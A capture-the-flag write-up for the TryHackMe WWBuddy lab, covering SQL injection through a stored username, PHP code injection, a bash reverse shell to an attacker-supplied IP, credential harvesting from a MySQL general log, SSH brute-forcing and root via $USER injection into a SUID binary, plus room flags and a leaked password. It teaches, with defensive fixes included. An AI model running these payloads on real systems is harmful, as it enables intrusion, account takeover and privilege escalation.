TryHackMe WriteUp
World Wide Buddy is a site for making friends, but it is still unfinished and has some security flaws.
TryHackMe WWBuddy — Enumeration
The first step of the enumeration is finding out which ports on the server are open. We do so by using nmap. Run the following command:

Only ports 22 and 80 are open. The service on port 22 is an SSH server and the service on port 80 is a web server running Apache. Let's enumerate the web server!
Web Server Enumeration
Start a gobuster scan to find hidden directories and files by running the following command:
gobuster dir -u http://10.10.105.98 -x php,txt,zip,bak -w /usr/share/wordlists/dirb/common.txt
The output is as follows:
/admin (Status: 301) [Size: 312] [--> http://10.10.105.98/admin/]
/api (Status: 301) [Size: 310] [--> http://10.10.105.98/api/]
/change (Status: 301) [Size: 313] [--> http://10.10.105.98/change/]
/chat.php (Status: 200) [Size: 1129]
/config.php (Status: 200) [Size: 0]
/images (Status: 301) [Size: 313] [--> http://10.10.105.98/images/]
/index.php (Status: 302) [Size: 7740] [--> /login]
/js (Status: 301) [Size: 309] [--> http://10.10.105.98/js/]
/login (Status: 301) [Size: 312] [--> http://10.10.105.98/login/]
/logout.php (Status: 302) [Size: 0] [--> /login]
/profile (Status: 301) [Size: 314] [--> http://10.10.105.98/profile/]
/register (Status: 301) [Size: 315] [--> http://10.10.105.98/register/]
/server-status (Status: 403) [Size: 277]
/styles (Status: 301) [Size: 313] [--> http://10.10.105.98/styles/]
When browsing to http://10.10.105.98/admin we find the following text:

This page might only be allowed for a specific set of users. Let’s leave it for now and check the web page itself.

Next, create an account to see what functionality is hidden behind the dashboard. After creating the account, log in. You should now see the following page:


The trick here is to turn the username itself into a SQL injection payload. The password-change handler presumably runs something like UPDATE users SET password='...' WHERE username='<stored username>' with the username concatenated into the query text rather than bound as a parameter. A username that closes the string literal and appends or 1=1 therefore makes the WHERE clause match every row: whenever this user's password is updated, every user's password is set to the same value. Change the username to the following: ' or 1=1 -- -
Click the Edit Info

Click the Change Password

Do not forget to add an e-mail address and a date of birth as well; any valid date and e-mail address will do. The next step is to change the password. Change the password to adminadmin and log out. Now log in with the credentials WWBuddy:adminadmin. You should now see the following page:

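To make the second-order injection concrete, the following is an added example (not the room's code; the real schema, column names and password storage of WWBuddy are unknown and are assumed here). It builds a small SQLite database, renames the attacker's own account to the payload, and then runs the password change once with the username spliced into the query text and once with it bound as a parameter:

```python
import hashlib
import sqlite3

# Constructed sample accounts; the app's real schema is assumed, not known.
USERS = ["WWBuddy", "Roberto", "Henry"]
PAYLOAD = "' or 1=1 -- -"


def pw_hash(password):
    # Hashing keeps the demo honest; a real app should use a slow, salted hash.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    for user in USERS:
        conn.execute("INSERT INTO users VALUES (?, ?)", (user, pw_hash(user + "-original")))
    conn.commit()
    return conn


def rename_user(conn, old, new):
    # Storing the payload is harmless by itself: this query is parameterized.
    conn.execute("UPDATE users SET username=? WHERE username=?", (new, old))
    conn.commit()


def change_password_vulnerable(conn, username, new_password):
    # The bug: the stored username is spliced into the WHERE clause as text, so
    # "' or 1=1 -- -" turns it into  WHERE username='' or 1=1 -- -'
    sql = f"UPDATE users SET password='{pw_hash(new_password)}' WHERE username='{username}'"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # number of accounts whose password was changed


def change_password_safe(conn, username, new_password):
    # Fix: bind the username; the payload is then just an odd literal string.
    cur = conn.execute(
        "UPDATE users SET password=? WHERE username=?", (pw_hash(new_password), username)
    )
    conn.commit()
    return cur.rowcount


def users_with_password(conn, password):
    rows = conn.execute(
        "SELECT username FROM users WHERE password=? ORDER BY username", (pw_hash(password),)
    )
    return [r[0] for r in rows]


def demo(handler):
    """Rename the attacker's account to the payload, change its password,
    and report how many accounts ended up with the new password."""
    conn = make_db()
    rename_user(conn, "WWBuddy", PAYLOAD)
    affected = handler(conn, PAYLOAD, "adminadmin")
    return affected, users_with_password(conn, "adminadmin")


if __name__ == "__main__":
    print("vulnerable:", demo(change_password_vulnerable))
    print("safe:      ", demo(change_password_safe))
```

The vulnerable handler reports three affected rows, the parameterized one exactly one. Note that the injection point is not the form that stores the username but the later query that trusts the stored value; input filtering at registration time would not have fixed it.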
Nice, we just changed the password of every user in the system. This means we can log in as any username we can find with the password adminadmin. Inside the current dashboard we see two other users, Roberto and Henry. We are also able to read their messages, but there is nothing useful there: Roberto only replied with a "Hi Bot" after the welcome message. Now log in as the next user, Henry.

Henry Dashboard

Here we find some interesting messages between Roberto and Henry: the default password of some user is equal to his or her date of birth. In an earlier step we found an admin page. Let's try to access it again, this time as Henry:
Access /admin/ as Henry

One interesting thing about this page is that it renders every user's username without any sanitization, and the username ends up inside PHP source that the server evaluates rather than in plain HTML output (a username that was merely echoed would be displayed, not executed). So a username of <?php system('id') ?> gives us code execution on the server. Log in as Roberto and change the username:
Log in as Roberto and change the username to: <?php system('id') ?>

Access the /admin/ directory as this user

Access the /admin/ directory as Henry

We get code execution and our first flag. Using <?php system($_GET['cmd']) ?> gave an error for some reason, so I created a file called shell.sh on my box with a reverse shell payload, opened up an HTTP server using Python, fetched the file first and executed it on the second run, as there was a limit on how long the username could be.
Change Roberto's username

Access the /admin/ directory as Henry
Nice, we can inject any command now. Use the following payload for the reverse shell: bash -i >& /dev/tcp/<your-ip>/4444 0>&1. URL-encode it before sending it through the cmd parameter, and start a listener on port 4444 first. The request below carries a URL-encoded php one-liner (the visible prefix %70%68%70%20%2d decodes to "php -" and the tail %29%3b%27 to ");'"):
curl -H 'Cookie: PHPSESSID=jt7p68up85hcuuj79eq6uhs77e' http://10.10.71.176/admin/?cmd=%70%68%70%20%2d%{Long code}%29%3b%27

TTY Shell Upgrade
python -c "import pty;pty.spawn('/bin/bash')"
Horizontal Privilege Escalation
After some time we find an interesting log file containing passwords: /var/log/mysql/general.log. MySQL's general query log records every statement the server receives verbatim, so any credential the application sends inside a query (a registration INSERT, a password UPDATE, a login comparison) is written to disk in plaintext, and anyone who can read the file gets it:
cat /var/log/mysql/general.log

Roberto:yVnocsXsf%X68wf
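Reading a busy general log by hand is slow, so here is an added triage script (my own example, not from the room) that pulls credentials out of the log's Query entries. The log lines are constructed to mimic the MySQL 5.7 general-log layout (timestamp, connection id, command, argument) and the passwords in them are made up; the column names `username` and `password` are assumed:

```python
import re

# Constructed sample of /var/log/mysql/general.log (MySQL 5.7 layout); values are made up.
SAMPLE_LOG = """\
/usr/sbin/mysqld, Version: 5.7.x-log ((Ubuntu)). started with:
Tcp port: 3306  Unix socket: /var/run/mysqld/mysqld.sock
Time                 Id Command    Argument
2020-07-28T10:01:02.000001Z\t    4 Connect\twwbuddy@localhost on wwbuddy using Socket
2020-07-28T10:01:02.000002Z\t    4 Query\tSELECT * FROM users WHERE username='Roberto'
2020-07-28T10:01:03.000003Z\t    4 Query\tINSERT INTO users (username, password, email) VALUES ('Roberto', 'ConstructedPass#1', 'r@example.com')
2020-07-28T10:01:04.000004Z\t    5 Query\tUPDATE users SET password='ConstructedPass#2' WHERE username='Henry'
2020-07-28T10:01:05.000005Z\t    5 Quit\t
"""

# One log entry: <time> <connection id> <command> <argument>
ENTRY_RE = re.compile(r"^(?P<time>\S+)\s+(?P<id>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")
# password='...' in SET or WHERE clauses (updates and login comparisons both leak)
PASS_RE = re.compile(r"\bpassword\s*=\s*'([^']*)'", re.IGNORECASE)
USER_RE = re.compile(r"\busername\s*=\s*'([^']*)'", re.IGNORECASE)
# INSERT INTO t (cols) VALUES (vals); naive, assumes no commas inside values
INSERT_RE = re.compile(
    r"INSERT\s+INTO\s+\w+\s*\(([^)]*)\)\s*VALUES\s*\(([^)]*)\)", re.IGNORECASE
)


def parse_entries(text):
    """Yield (time, connection id, query) for every Query entry in the log."""
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m and m.group("cmd") == "Query":
            yield m.group("time"), int(m.group("id")), m.group("arg")


def _split_values(s):
    return [v.strip().strip("'") for v in s.split(",")]


def leaked_credentials(text):
    """Return (time, connection id, username, password) for each query
    that carries a password literal."""
    findings = []
    for ts, cid, query in parse_entries(text):
        m = INSERT_RE.search(query)
        if m:
            cols = [c.strip().lower() for c in m.group(1).split(",")]
            vals = _split_values(m.group(2))
            if "password" in cols and len(cols) == len(vals):
                user = vals[cols.index("username")] if "username" in cols else None
                findings.append((ts, cid, user, vals[cols.index("password")]))
            continue
        pw = PASS_RE.search(query)
        if pw:
            user = USER_RE.search(query)
            findings.append((ts, cid, user.group(1) if user else None, pw.group(1)))
    return findings


if __name__ == "__main__":
    for ts, cid, user, password in leaked_credentials(SAMPLE_LOG):
        print(f"{ts} conn={cid} {user}:{password}")
```

The defensive takeaway is the same whichever side of the log you are on: the general log should stay disabled in production, and when it is needed for debugging it must be treated as sensitive as the database itself.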
Trying to log in as roberto

Roberto's home directory

Content of importante.txt
$ cat importante.txt
A Jenny vai ficar muito feliz quando ela descobrir que foi contratada :DD
Não esquecer que semana que vem ela faz 26 anos, quando ela ver o presente que eu comprei pra ela, talvez ela até anima de ir em um encontro comigo.
THM{g4d0_d+_kkkk}
Translation
Jenny is going to be very happy when she finds out she was hired :DD
Don't forget that next week she turns 26; when she sees the present I bought for her, maybe she will even be up for going on a date with me.
Information on the file importante.txt

The file was created on 2020-07-27. The note says Jenny turns 26 "next week", which puts her birthday in the days after 27 July, in 1994 (or 1995 if the age in the note is off by one). So let's create a wordlist to brute-force jenny's password. Earlier, the birthday on the web app was in the format mm/dd/yyyy, so the wordlist follows that format. (07/32 is not a valid date and can be dropped from the list; it costs nothing but a wasted attempt.)
Create WordList
08/01/1994
08/02/1994
08/03/1994
08/04/1994
08/05/1994
08/06/1994
08/07/1994
08/08/1994
08/09/1994
08/10/1994
07/28/1994
07/29/1994
07/30/1994
07/31/1994
07/32/1994
08/11/1994
08/01/1995
08/02/1995
08/03/1995
08/04/1995
08/05/1995
08/06/1995
08/07/1995
08/08/1995
08/09/1995
08/10/1995
08/11/1995
07/28/1995
07/29/1995
07/30/1995
07/31/1995
07/32/1995
Using hydra to brute-force the SSH password

After a while hydra finds jenny's password and we can log in over SSH as jenny. Run python -c "import pty;pty.spawn('/bin/bash')" to upgrade the shell again.
Vertical Privilege Escalation
Listing all SUID binaries
jenny@wwbuddy:~$ find / -type f -perm -4000 -ls 2>/dev/null
66 40 -rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8268/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8268/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8268/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/8268/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Oct 10 2019 /snap/core/8268/bin/umount
…………….
…………….
267949 12 -rwsr-xr-x 1 root root 8584 Jul 28 2020 /bin/authenticate
…………….
jenny@wwbuddy:~$ id
uid=1002(jenny) gid=1002(jenny) groups=1002(jenny)
The non-standard one is /bin/authenticate, dated the same week the box was built. Download it for offline analysis; scp with roberto's known password does the job:
local@local:~/Documents/tryhackme/wwbuddy$ scp roberto@10.10.39.232:/bin/authenticate authenticate
roberto@10.10.39.232's password:
authenticate 100% 8584 22.8KB/s 00:00
Now import the binary into Ghidra so that we can reverse-engineer it. The decompiler output of main looks as follows (comments added; the three constants are the string "usermod -G developer " stored as little-endian qwords):
undefined8 main(void)
{
    __uid_t __uid;
    int iVar1;
    char *__src;
    long in_FS_OFFSET;
    undefined8 local_48;
    undefined8 local_40;
    undefined8 local_38;
    undefined8 local_30;
    undefined8 local_28;
    undefined4 local_20;
    undefined local_1c;
    long local_10;

    local_10 = *(long *)(in_FS_OFFSET + 0x28);      /* stack canary */
    __uid = getuid();
    if ((int)__uid < 1000) {
        puts("You need to be a real user to be authenticated.");
    }
    else {
        iVar1 = system("groups | grep developer");
        if (iVar1 == 0) {
            puts("You are already a developer.");
        }
        else {
            __src = getenv("USER");                 /* fully controlled by the caller */
            __uid = getuid();
            setuid(0);                              /* become root for the next call */
            local_48 = 0x20646f6d72657375;          /* "usermod " */
            local_40 = 0x6c6576656420472d;          /* "-G devel" */
            local_38 = 0x207265706f;                /* "oper "   */
            local_30 = 0;
            local_28 = 0;
            local_20 = 0;
            local_1c = 0;
            strncat((char *)&local_48,__src,0x14);  /* append at most 20 bytes of $USER */
            system((char *)&local_48);              /* runs "usermod -G developer $USER" through /bin/sh as root */
            puts("Group updated");
            setuid(__uid);
            system("newgrp developer");
        }
    }
    if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
        /* WARNING: Subroutine does not return */
        __stack_chk_fail();
    }
    return 0;
}
Privilege Escalation: Executing commands as root
The binary calls setuid(0) and then hands system() a command string built from getenv("USER"). The USER variable is set by our own shell, and system() runs the string through /bin/sh -c, so a value of "; bash" turns the command into usermod -G developer ; bash: usermod exits with its usage message because it was given no LOGIN argument, and bash then starts as root. The strncat limit of 0x14 (20) bytes caps the injected part at 20 characters, which is plenty for "; bash". Note the two checks we have to satisfy to reach that code path: our uid must be at least 1000 (jenny is 1002) and we must not already be in the developer group.
jenny@wwbuddy:~$ id
uid=1002(jenny) gid=1002(jenny) groups=1002(jenny)
jenny@wwbuddy:~$ export USER="; bash"
jenny@wwbuddy:~$ /bin/authenticate
Usage: usermod [options] LOGIN
Options:
  -c, --comment COMMENT         new value of the GECOS field
  -d, --home HOME_DIR           new home directory for the user account
  -e, --expiredate EXPIRE_DATE  set account expiration date to EXPIRE_DATE
  -f, --inactive INACTIVE       set password inactive after expiration
                                to INACTIVE
  -g, --gid GROUP               force use GROUP as new primary group
  -G, --groups GROUPS           new list of supplementary GROUPS
  -a, --append                  append the user to the supplemental GROUPS
                                mentioned by the -G option without removing
                                him/her from other groups
  -h, --help                    display this help message and exit
  -l, --login NEW_LOGIN         new value of the login name
  -L, --lock                    lock the user account
  -m, --move-home               move contents of the home directory to the
                                new location (use only with -d)
  -o, --non-unique              allow using duplicate (non-unique) UID
  -p, --password PASSWORD       use encrypted password for the new password
  -R, --root CHROOT_DIR         directory to chroot into
  -s, --shell SHELL             new login shell for the user account
  -u, --uid UID                 new UID for the user account
  -U, --unlock                  unlock the user account
  -v, --add-subuids FIRST-LAST  add range of subordinate uids
  -V, --del-subuids FIRST-LAST  remove range of subordinate uids
  -w, --add-subgids FIRST-LAST  add range of subordinate gids
  -W, --del-subgids FIRST-LAST  remove range of subordinate gids
  -Z, --selinux-user SEUSER     new SELinux user mapping for the user account
root@wwbuddy:~#
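To check the reading of the decompiled code without a debugger, here is an added Python example (my own, not part of the writeup or the box) that decodes the three stack constants into the command prefix, shows exactly what system() receives for a given USER value, including the 20-byte strncat truncation, and sketches how the same feature could have been written safely. The regular expression for valid login names and the `-a` flag are my assumptions about a hardened version, not anything the binary does:

```python
import os
import pwd
import re
import struct

# The three qwords Ghidra shows being written to the stack buffer, in order.
STACK_QWORDS = (0x20646f6d72657375, 0x6c6576656420472d, 0x207265706f)
STRNCAT_LIMIT = 0x14  # strncat(buf, getenv("USER"), 0x14)


def decode_stack_string(qwords=STACK_QWORDS):
    """Little-endian qwords laid out back to back form a NUL-terminated C string."""
    raw = b"".join(struct.pack("<Q", q) for q in qwords)
    return raw.split(b"\0", 1)[0].decode("ascii")


def command_as_built(user_env):
    """What /bin/sh -c receives: the fixed prefix plus at most 20 bytes of $USER.

    The caller of the SUID binary chooses $USER, so anything after a ';'
    is a second command that runs with the uid set by setuid(0)."""
    return decode_stack_string() + user_env[:STRNCAT_LIMIT]


# Assumed policy for a hardened version: a conservative login-name syntax.
LOGIN_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def hardened_argv(login):
    """argv for an execve-style call with no shell in between.

    Validating the name is belt and braces; the real fix is the fixed argv
    list, which makes '; bash' a (rejected) user name instead of a command.
    -a is used so existing supplementary groups are kept."""
    if not LOGIN_RE.fullmatch(login):
        raise ValueError(f"refusing suspicious login name: {login!r}")
    return ["usermod", "-a", "-G", "developer", login]


def current_login():
    """Derive the caller's name from the real uid, never from $USER."""
    return pwd.getpwuid(os.getuid()).pw_name


if __name__ == "__main__":
    print(repr(decode_stack_string()))
    print(repr(command_as_built("; bash")))
    print(repr(command_as_built("; bash -c 'cat /root/root.txt'")))  # truncated
    print(hardened_argv("jenny"))
    try:
        hardened_argv("; bash")
    except ValueError as err:
        print(err)
```

The third print shows why a short payload matters here: a longer one-liner is silently cut at 20 bytes and would leave the shell with a dangling quote instead of a command. The hardened variant also keeps the privileged work inside a single exec of a known binary; wrapping setuid(0) around a shell, as the original does, hands root to whatever the environment contains.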
Root Flag
root@wwbuddy:/root# cat root.txt
THM{ch4ng3_th3_3nv1r0nm3nt}
I really enjoyed rooting this box. The box taught me some useful tricks about SQL injections. Furthermore, I learned how environment variables can be abused to gain higher privileges! The last lesson here is to keep your passwords safe. Never communicate about your passwords in any form at all!